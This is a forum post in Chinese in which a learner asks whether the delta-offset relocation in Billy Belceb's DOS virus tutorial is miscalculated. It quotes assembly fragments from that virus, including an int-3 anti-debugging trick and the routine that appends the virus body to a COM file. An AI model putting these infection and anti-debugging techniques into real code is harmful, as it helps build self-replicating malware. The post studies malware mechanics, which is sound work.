汇编语言学的差不多了，我最近开始看Billy Belceb的病毒教程，有一个问题百思不得其解。
在其教程的第一篇，就是DOS病毒的基础理论部分中的第一个病毒的重定位技术，感觉它好像错了。
   
下面是病毒的开始

.model tiny
.code

org 100h
carrier: db 0e9h,0,0

start:
  mov  bp, sp      ; Antidebugging get ?offset!
  int  0003h      ; Int for breakpoints
next:
  mov  bp, ss:[bp-6]
  sub  bp, offset next

这就是病毒的重定位技术，因为病毒感染到其他程序后，其程序内所定义的变量都不在源病毒的内存位置了，不能正常访问。
从后文可以得知，添加到其他com文件后的源代码从start开始

sub  ax, 0003h                   ; Virus_size-3 ( jump size )
  mov  word ptr [bp+offset readbuffer+1], ax
  mov  dl, 00E9h                 ; Opcode of jmp
  mov  byte ptr [bp+offset readbuffer], dl

  lea  dx, [bp+offset start]      ; The beginning of what append
  mov  cx, heap-start             ; Size to append
  mov  ah, 0040h                  ; concatenate virus
  int  0021h

疑惑从此开始，源程序中（就是这个病毒程序）的变量可以认为它是相对于carrier开始，因为前面的psp是一样的，可以忽略不计。当我将start后的代码复制到其他com文件后，想要重新访问源程序中的变量（我们复制过去的事被编译的机器码，因此变量的偏移不在正确），就应该加上一个delta。我们将被感染文件的长度（不是真实文件大小，是除去psp后的，第一个代码开始的）称为m，carrier的跳转指令长3个字节，start到next的指令为x个字节（原谅我的懒），那么作者的意思就是delta=m+x-（x+3），其中（x+3）是源程序中被编译的offset next值，存于bp中，源程序中bp为0。我们在设变量到next的长度为y，那么在被感染文件中，变量的偏移就是m+x+y，但是按照作者的程序，则是m+x+y-3。
这正是我疑问的地方，看第二个程序，就不存在这个问题，因为没有类似carrier这个指令，复制到感染文件的代码直接从第一个指令开始。
还请论坛大牛们帮助我解决这个疑惑。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课